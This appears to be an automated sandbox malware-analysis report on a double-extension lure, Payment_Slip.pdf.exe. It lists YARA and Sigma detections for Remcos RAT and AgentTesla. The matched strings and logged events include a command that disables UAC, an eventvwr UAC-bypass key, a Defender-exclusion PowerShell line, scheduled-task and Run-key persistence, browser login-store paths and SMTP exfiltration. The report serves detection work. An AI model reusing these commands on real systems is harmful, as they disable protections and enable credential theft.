Process Memory Space: mykksg.exe PID: 8792	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
decrypted.memstr	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 65 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.0.host.exe.240000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
13.0.conserver.exe.d70000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
13.0.conserver.exe.d70000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
13.0.conserver.exe.d70000.0.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x30161:$a13: get_DnsResolver 0x2e980:$a20: get_LastAccessed 0x30adf:$a27: set_InternalServerPort 0x30e13:$a30: set_GuidMasterKey 0x2ea87:$a33: get_Clipboard 0x2ea95:$a34: get_Keyboard 0x2fd94:$a35: get_ShiftKeyDown 0x2fda5:$a36: get_AltKeyDown 0x2eaa2:$a37: get_Password 0x2f544:$a38: get_PasswordHash 0x30561:$a39: get_DefaultCredentials
13.0.conserver.exe.d70000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32a2d:$s10: logins 0x32494:$s11: credential 0x2ea87:$g1: get_Clipboard 0x2ea95:$g2: get_Keyboard 0x2eaa2:$g3: get_Password 0x2fd84:$g4: get_CtrlKeyDown 0x2fd94:$g5: get_ShiftKeyDown 0x2fda5:$g6: get_AltKeyDown
7.2.mHTmhPhJy.exe.416f180.4.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.mHTmhPhJy.exe.416f180.4.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
7.2.mHTmhPhJy.exe.416f180.4.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
7.2.mHTmhPhJy.exe.416f180.4.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
7.2.mHTmhPhJy.exe.41e47a0.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.mHTmhPhJy.exe.41e47a0.3.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
7.2.mHTmhPhJy.exe.41e47a0.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
7.2.mHTmhPhJy.exe.41e47a0.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
11.2.mHTmhPhJy.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.mHTmhPhJy.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
11.2.mHTmhPhJy.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
11.2.mHTmhPhJy.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
0.2.Payment_Slip.pdf.exe.3483d88.4.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.Payment_Slip.pdf.exe.3483d88.4.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
0.2.Payment_Slip.pdf.exe.3483d88.4.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
0.2.Payment_Slip.pdf.exe.3483d88.4.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
0.2.Payment_Slip.pdf.exe.340e768.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.Payment_Slip.pdf.exe.340e768.3.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
0.2.Payment_Slip.pdf.exe.340e768.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
0.2.Payment_Slip.pdf.exe.340e768.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
17.0.dwn.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.dwn.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
17.0.dwn.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
17.0.dwn.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
17.2.dwn.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.dwn.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
17.2.dwn.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
17.2.dwn.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
11.2.mHTmhPhJy.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.mHTmhPhJy.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
11.2.mHTmhPhJy.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
11.2.mHTmhPhJy.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0xdcc20:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0xdd178:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v 0xdd4fd:$a4: * Remcos v
7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0xd6b40:$s1: \Classes\mscfile\shell\open\command 0xd6ba0:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe 0xd6b88:$s2: eventvwr.exe
7.2.mHTmhPhJy.exe.416f180.4.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.mHTmhPhJy.exe.416f180.4.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0xdd000:$a1: Remcos restarted by watchdog! 0x152240:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0xdd558:$a3: %02i:%02i:%02i:%03i 0x152798:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v 0xdd8dd:$a4: * Remcos v 0x152b1d:$a4: * Remcos v
7.2.mHTmhPhJy.exe.416f180.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0xd6f20:$s1: \Classes\mscfile\shell\open\command 0xd6f80:$s1: \Classes\mscfile\shell\open\command 0x14c160:$s1: \Classes\mscfile\shell\open\command 0x14c1c0:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe 0xd6f68:$s2: eventvwr.exe 0x14c1a8:$s2: eventvwr.exe
0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0xdcc20:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0xdd178:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v 0xdd4fd:$a4: * Remcos v
0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0xd6b40:$s1: \Classes\mscfile\shell\open\command 0xd6ba0:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe 0xd6b88:$s2: eventvwr.exe
0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0xdd000:$a1: Remcos restarted by watchdog! 0x152240:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0xdd558:$a3: %02i:%02i:%02i:%03i 0x152798:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v 0xdd8dd:$a4: * Remcos v 0x152b1d:$a4: * Remcos v
0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0xd6f20:$s1: \Classes\mscfile\shell\open\command 0xd6f80:$s1: \Classes\mscfile\shell\open\command 0x14c160:$s1: \Classes\mscfile\shell\open\command 0x14c1c0:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe 0xd6f68:$s2: eventvwr.exe 0x14c1a8:$s2: eventvwr.exe
Click to see the 44 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", CommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Payment_Slip.pdf.exe, NewProcessName: C:\Users\user\Desktop\Payment_Slip.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ProcessId: 8060, ProcessName: Payment_Slip.pdf.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\conserver.exe, ProcessId: 8164, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentProcessId: 8060, ParentProcessName: Payment_Slip.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", ProcessId: 8180, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\host.exe, ProcessId: 4860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mykksg

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe, ParentImage: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe, ParentProcessId: 7856, ParentProcessName: mHTmhPhJy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp", ProcessId: 1944, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 66.102.1.109, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\conserver.exe, Initiated: true, ProcessId: 8164, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentProcessId: 8060, ParentProcessName: Payment_Slip.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", ProcessId: 7200, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentProcessId: 8060, ParentProcessName: Payment_Slip.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", ProcessId: 8180, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 60, ProcessName: svchost.exe

Persistence and Installation Behavior

